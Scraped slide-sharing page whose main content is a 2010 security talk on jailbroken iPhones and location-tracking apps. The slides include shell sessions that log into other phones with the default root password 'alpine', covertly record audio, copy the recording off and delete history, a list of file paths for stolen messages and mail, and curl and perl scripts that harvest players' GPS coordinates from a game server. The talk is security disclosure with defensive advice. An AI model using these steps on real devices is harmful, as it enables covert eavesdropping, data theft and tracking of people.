šŸ¬ The future of MySQL is Postgres šŸ˜
šŸ¬ The future of MySQL is Postgres šŸ˜šŸ¬ The future of MySQL is Postgres šŸ˜
šŸ¬ The future of MySQL is Postgres šŸ˜RTylerCroy
Ā 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
Ā 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
Ā 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
Ā 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
Ā 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
Ā 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
Ā 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
Ā 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
Ā 
Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024The Digital Insurer
Ā 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
Ā 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
Ā 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
Ā 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
Ā 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
Ā 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
Ā 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
Ā 

Recently uploaded (20)

2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
Ā 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Ā 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
Ā 
šŸ¬ The future of MySQL is Postgres šŸ˜
šŸ¬ The future of MySQL is Postgres šŸ˜šŸ¬ The future of MySQL is Postgres šŸ˜
šŸ¬ The future of MySQL is Postgres šŸ˜
Ā 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Ā 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
Ā 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Ā 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
Ā 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Ā 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Ā 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
Ā 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
Ā 
Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024
Ā 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Ā 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
Ā 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
Ā 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
Ā 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Ā 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
Ā 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
Ā 

The New World of Smartphone Security

  • 1. The New World of Smartphone Security What Your iPhone Disclosed About You Trevor Hawthorn Managing Partner Friday, July 9, 2010
  • 2. Todayā€™s Talk ā€œPockets full of shellsā€ Friday, July 9, 2010
  • 3. Todayā€™s Talk ā€œI can see you from my houseā€ Friday, July 9, 2010
  • 4. Who I am now Friday, July 9, 2010
  • 5. Old Smartphone Best Practices = Bad = Good Friday, July 9, 2010
  • 6. New Smartphone Best Practices 1. IT will use the iPhone Conļ¬guration Utility so you can talk to Exchange, use the VPN, wireless, etc. 2. Get iFart, itā€™s hilarious. Friday, July 9, 2010
  • 7. If AT&T is in attendance: Friday, July 9, 2010
  • 8. If AT&T is in attendance: ā€¢ Facts about AT&T and me: Friday, July 9, 2010
  • 9. If AT&T is in attendance: ā€¢ Facts about AT&T and me: ā€¢ I enjoy my AT&T wireless service Friday, July 9, 2010
  • 10. If AT&T is in attendance: ā€¢ Facts about AT&T and me: ā€¢ I enjoy my AT&T wireless service ā€¢ Feel that I have fantastic coverage everywhere I go at all times Friday, July 9, 2010
  • 11. If AT&T is in attendance: ā€¢ Facts about AT&T and me: ā€¢ I enjoy my AT&T wireless service ā€¢ Feel that I have fantastic coverage everywhere I go at all times ā€¢ Am sure you have the largest/fastest 3G network, regardless of what VZW says Friday, July 9, 2010
  • 12. If AT&T is in attendance: ā€¢ Facts about AT&T and me: ā€¢ I enjoy my AT&T wireless service ā€¢ Feel that I have fantastic coverage everywhere I go at all times ā€¢ Am sure you have the largest/fastest 3G network, regardless of what VZW says ā€¢ Looking forward to years of receiving quality service from you Friday, July 9, 2010
  • 13. If AT&T is in attendance: ā€¢ Facts about AT&T and me: ā€¢ I enjoy my AT&T wireless service ā€¢ Feel that I have fantastic coverage everywhere I go at all times ā€¢ Am sure you have the largest/fastest 3G network, regardless of what VZW says ā€¢ Looking forward to years of receiving quality service from you ā€¢ Would love to chat Friday, July 9, 2010
  • 14. Jailbreaking blackra1n pwnagetool Friday, July 9, 2010
  • 15. It opens up a whole new world of applications Friday, July 9, 2010
  • 16. It opens up a whole new world of applications ā€¢ common Unix binaries Friday, July 9, 2010
  • 17. It opens up a whole new world of applications ā€¢ common Unix binaries ā€¢ sshd Friday, July 9, 2010
  • 18. It opens up a whole new world of applications ā€¢ common Unix binaries ā€¢ sshd ā€¢ tethering Friday, July 9, 2010
  • 19. It opens up a whole new world of applications ā€¢ common Unix binaries ā€¢ sshd ā€¢ tethering ā€¢ pirate software Friday, July 9, 2010
  • 20. It opens up a whole new world of applications ā€¢ common Unix binaries ā€¢ sshd ā€¢ tethering ā€¢ pirate software ā€¢ super easy to JB your phone Friday, July 9, 2010
  • 21. Impact on security ā€œJail breaking removes 80% of the iPhoneā€™s security precautionsā€ Charlie Miller, SyScan 2009 Friday, July 9, 2010
  • 22. How many iPhones are jailbroken? Friday, July 9, 2010
  • 23. 6.93% [1]http://www.slideshare.net/pinchmedia/piracy-on-the-appstore Friday, July 9, 2010
  • 25. ifconļ¬g root# ifconļ¬g lo0: ļ¬‚ags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384 inet 127.0.0.1 netmask 0xff000000 en0: ļ¬‚ags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500 ether 00:21:e9:09:e3:4f pdp_ip0: ļ¬‚ags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff pdp_ip1: ļ¬‚ags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 pdp_ip2: ļ¬‚ags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 pdp_ip3: ļ¬‚ags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 en1: ļ¬‚ags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255 ether 0a:0b:ad:0b:ab:e0 Friday, July 9, 2010
  • 27. Interfaces en0 = 802.11 interface Friday, July 9, 2010
  • 28. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular Friday, July 9, 2010
  • 29. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail Friday, July 9, 2010
  • 30. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail pdp_ip2 = not sure Friday, July 9, 2010
  • 31. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail pdp_ip2 = not sure pdp_ip3 = used with tethering Friday, July 9, 2010
  • 32. ifconļ¬g pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff Friday, July 9, 2010
  • 35. Until (about) October 16, 2009 AT&T did not ļ¬lter device to device IP network trafļ¬c. Friday, July 9, 2010
  • 36. AT&Tā€™s Network Most people think it looks like this: /32 Friday, July 9, 2010
  • 37. AT&Tā€™s Network Actually, more like this: Multiple /16ā€™s Friday, July 9, 2010
  • 38. Your smartphone (and laptop/ blackberry, etc.) has been on one giant flat network... Friday, July 9, 2010
  • 39. So I started looking around... Friday, July 9, 2010
  • 42. Devices On the Network 10,589* IPs scanned Count Port What? 83 22 sshd 24 80 http 4 2008 PDANet 3,644 62078 iPhone Default Friday, July 9, 2010
  • 43. Other stuff out there ā€¢ Saw a Linux box with sshd ā€¢ Windows Mobile devices ā€¢ Blackberries ā€¢ Windows PCā€™s ā€¢ PDANet for the iPhone is an open proxy. Friday, July 9, 2010
  • 45. ssh access between phones Trevors-iPhone:~ root# ssh root@10.69.62.100 Password: [alpine] Nates-iPhone:~ root# Nates-iPhone:~ root# id uid=0(root) gid=0(wheel) groups=0(wheel),1 (daemon),2(kmem),3(sys),4(tty),5(operator),8 (procview),9(procmod),20(staff),29 (certusers),80(admin) Friday, July 9, 2010
  • 46. Filesystem Guide Interesting stuff: /private/var/mobile/Library/Mail - Email (IMAP Exchange, POP3, etc.) , /private/var/mobile/Library/SMS - SMS Text Messages /private/var/mobile/Library/Voicemail - Voicemail in .amr format /private/var/mobile/Library/AddressBook - Contacts /private/var/mobile/Library/CallHistory - Call History /private/var/mobile/Library/Notes - Notes Friday, July 9, 2010
  • 47. /private/var/mobile/Library/CallHistory/call_history.db /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb /private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb /private/var/mobile/Library/Cookies/Cookies.plist /private/var/mobile/Library/Keyboard/dynamic-text.dat /private/var/mobile/Library/Mail/Accounts.plist /private/var/mobile/Library/Mail/(mail account name)/Deleted Messages /private/var/mobile/Library/Mail/(mail account name)/Sent Messages /private/var/mobile/Library/Mail/(mail account name)/INBOX /private/var/mobile/Library/Maps/History.plist /private/var/mobile/Library/YouTube/Bookmarks.plist /private/var/mobile/Library/Voicemail/(amr ļ¬les) /private/var/mobile/Library/Voicemail/voicemail.db /private/var/mobile/Library/Safari/Bookmarks.plist /private/var/mobile/Library/Safari/History.plist /private/var/mobile/Library/Suspend.plist /private/var/mobile/Library/Safari/SuspendState.plist /private/var/mobile/Library/Safari/SMS/sms.db /private/var/mobile/Library/Preference/(various preference Plists) /private/var/mobile/Library/Notes/notes.db Friday, July 9, 2010
  • 48. Letā€™s do a bit more Erica Utilities - cmd line utilities for the iPhone recAudio: Record audio from the recAudio onboard microphone. Queries the iPhoneā€™s GPS API to findme return latitude/longitude Friday, July 9, 2010
  • 49. Attacker Victim recAudio scp/ssh recording.aiff 10.69.62.220 10.69.62.100 Friday, July 9, 2010
  • 50. I can hear you typing Trevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100: Password: recAudio 100% 19KB 1.3KB/s 00:00 Trevors-iPhone:~ root# ssh root@10.69.62.100 Password: Nates-iPhone:~ root# ./recAudio Start talking. Press ^C to finish. Starting recording ^C Interrupted. Stopping recording Friday, July 9, 2010
  • 51. Nates-iPhone:~ root# ls -l *.aiff -rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92 at 22:35:04.aiff Nates-iPhone:~ root# mv 2009-10-92 at 22:35:04.aiff test.aiff Trevors-iPhone: root# scp root@10.69.62.100:~/*.aiff . Password: test.aiff 100% 523KB 2.2KB/ s 00:00 Nates-iPhone:~ root# rm test.aiff recAudio .bash_history Nates-iPhone:~ root# last wtmp begins at Fri Oct 2 22:41 Nates-iPhone:~ root# Friday, July 9, 2010
  • 52. Other bad things Friday, July 9, 2010
  • 53. Other bad things ā€¢ ./openURL tel://1-900-XXX-XXX Friday, July 9, 2010
  • 54. Other bad things ā€¢ ./openURL tel://1-900-XXX-XXX ā€¢ ./openURL tel://911 or tel://mynumber Friday, July 9, 2010
  • 55. Other bad things ā€¢ ./openURL tel://1-900-XXX-XXX ā€¢ ./openURL tel://911 or tel://mynumber ā€¢ Pillage ļ¬lesystem: email, sms, notes, app data, etc. Friday, July 9, 2010
  • 56. Other bad things ā€¢ ./openURL tel://1-900-XXX-XXX ā€¢ ./openURL tel://911 or tel://mynumber ā€¢ Pillage ļ¬lesystem: email, sms, notes, app data, etc. ā€¢ apt-get install tcpdump nmap Friday, July 9, 2010
  • 57. Other bad things ā€¢ ./openURL tel://1-900-XXX-XXX ā€¢ ./openURL tel://911 or tel://mynumber ā€¢ Pillage ļ¬lesystem: email, sms, notes, app data, etc. ā€¢ apt-get install tcpdump nmap ā€¢ go wild on whatever network en0 is connected to. Friday, July 9, 2010
  • 59. Dutch Extortion November 2009 Friday, July 9, 2010
  • 60. ikee Worm November 2009 Friday, July 9, 2010
  • 61. Exploits ā€¢ Phone/Privacy.A* command line tool ā€¢ Phone/iBotNet.A* worm with C&C *Discovered by security ļ¬rm Intego Friday, July 9, 2010
  • 62. Some good news Friday, July 9, 2010
  • 63. Some good news ā€¢ AT&T does segment part of their network: Friday, July 9, 2010
  • 64. Some good news ā€¢ AT&T does segment part of their network: ā€¢ e.g. I could not see friend in CA from DC Friday, July 9, 2010
  • 65. Some good news ā€¢ AT&T does segment part of their network: ā€¢ e.g. I could not see friend in CA from DC ā€¢ But I could see friend in Boston Friday, July 9, 2010
  • 66. Some good news ā€¢ AT&T does segment part of their network: ā€¢ e.g. I could not see friend in CA from DC ā€¢ But I could see friend in Boston ā€¢ No easy way to target speciļ¬c individual (Identity to AT&T NAT IP address not super easy) Friday, July 9, 2010
  • 67. Some good news ā€¢ AT&T does segment part of their network: ā€¢ e.g. I could not see friend in CA from DC ā€¢ But I could see friend in Boston ā€¢ No easy way to target speciļ¬c individual (Identity to AT&T NAT IP address not super easy) ā€¢ No way to correlate 10.x.x.x IP to person via Safari Friday, July 9, 2010
  • 68. Some good news ā€¢ AT&T does segment part of their network: ā€¢ e.g. I could not see friend in CA from DC ā€¢ But I could see friend in Boston ā€¢ No easy way to target speciļ¬c individual (Identity to AT&T NAT IP address not super easy) ā€¢ No way to correlate 10.x.x.x IP to person via Safari ā€¢ decloak.net doesnā€™t really work in Mobile Safari Friday, July 9, 2010
  • 69. Some good news ā€¢ AT&T does segment part of their network: ā€¢ e.g. I could not see friend in CA from DC ā€¢ But I could see friend in Boston ā€¢ No easy way to target speciļ¬c individual (Identity to AT&T NAT IP address not super easy) ā€¢ No way to correlate 10.x.x.x IP to person via Safari ā€¢ decloak.net doesnā€™t really work in Mobile Safari ā€¢ Man this is slow... Friday, July 9, 2010
  • 70. email to ID user <img src=ā€http://10.69.62.220/i.jpgā€> 10.69.63.220:80 10.69.63.110 src:10.69.63.110 10.69.63.220:80 10.69.63.110 dst:10.69.63.220 Friday, July 9, 2010
  • 71. What to do ā€¢ Donā€™t Jailbreak your phone if you care about security (sorry) ā€¢ Change root and mobile usersā€™ passwords ā€¢ Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install ā€¢ IT Folks: Policy on jailbroken iphones ā€¢ AT&T: Filter mobile to mobile IP trafļ¬c Friday, July 9, 2010
  • 72. Privacy and Location Based Apps Friday, July 9, 2010
  • 74. Location Based Apps ā€¢ Underworld: Sweet Deal Friday, July 9, 2010
  • 75. Location Based Apps ā€¢ Underworld: Sweet Deal ā€¢ Drug trafļ¬cking game with candy Friday, July 9, 2010
  • 76. Location Based Apps ā€¢ Underworld: Sweet Deal ā€¢ Drug trafļ¬cking game with candy ā€¢ Location matters, move product from point A to point B Friday, July 9, 2010
  • 77. Location Based Apps ā€¢ Underworld: Sweet Deal ā€¢ Drug trafļ¬cking game with candy ā€¢ Location matters, move product from point A to point B ā€¢ Phone sends high resolution coordinates to game server Friday, July 9, 2010
  • 81. Paros ā€¢ Client side proxy ā€¢ Conļ¬gure iPhone to use machine running Parosā€™s IP address as proxy ā€¢ Watch what your apps send and receive Friday, July 9, 2010
  • 84. Used to monitor players Friday, July 9, 2010
  • 90. Letā€™s pick a non-intel agency player chezk Friday, July 9, 2010
  • 96. Ok neat, what else? Friday, July 9, 2010
  • 97. Near real-time geolocation tracking of players Friday, July 9, 2010
  • 98. cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots Friday, July 9, 2010
  • 99. curl script #/bin/sh # # First login... # curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -d @/home/trevor/iphone/login.xml --dump-header /home/ trevor/iphone/headers.txt http://game.dl.a-steroids.com/TrafficServer/ # # Then update location curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/ update_loc.xml http://game.dl.a-steroids.com/TrafficServer/ # # Get GMap obhjects curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/ gmap_update.xml http://game.dl.a-steroids.com/TrafficServer/ Friday, July 9, 2010
  • 100. perl script #! /usr/bin/perl use strict; use warnings; # make single or multiline input into one scalar my $glob = join('',(<>)); # extract name-to-flag records my @records = $glob =~ /(<name>.*?</lon>)/ig; for (@records) { my ($name,$lat,$lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([-d.]*)</lat><lon>([-d .]*)</lon>|i; print "$lat,$lon,$namen"; } Friday, July 9, 2010
  • 101. perl script output 39.93220206723633,-77.47186584472656,poppyseed 38.13753356933594,-77.06847380591797,Gadsden 39.98429718017578,-78.30014190673828,Ziggety 39.23520812988281,-77.40483581542969,Lexi 39.855418395996094,-77.2717056274414,Tatu 39.55705801582031,-77.4004086303711,Bigfoot 36.67790985107422,-77.5902328491211,Jeneko 38.297552490234375,-77.65829467773438,Stilbored 39.891050720214844,-77.55879211025781,Timoteo 39.66313247680664,-78.04374694824219,Gamber 36.295310314697266,-78.14061126700984,UnderWear Friday, July 9, 2010
  • 110. Comments/Feedback: trevor.hawthorn@stratumsecurity.com www.stratumsecurity.com Twitter: @packetwerks @stratumsecurity Special Thanks: Tiago Stock Friday, July 9, 2010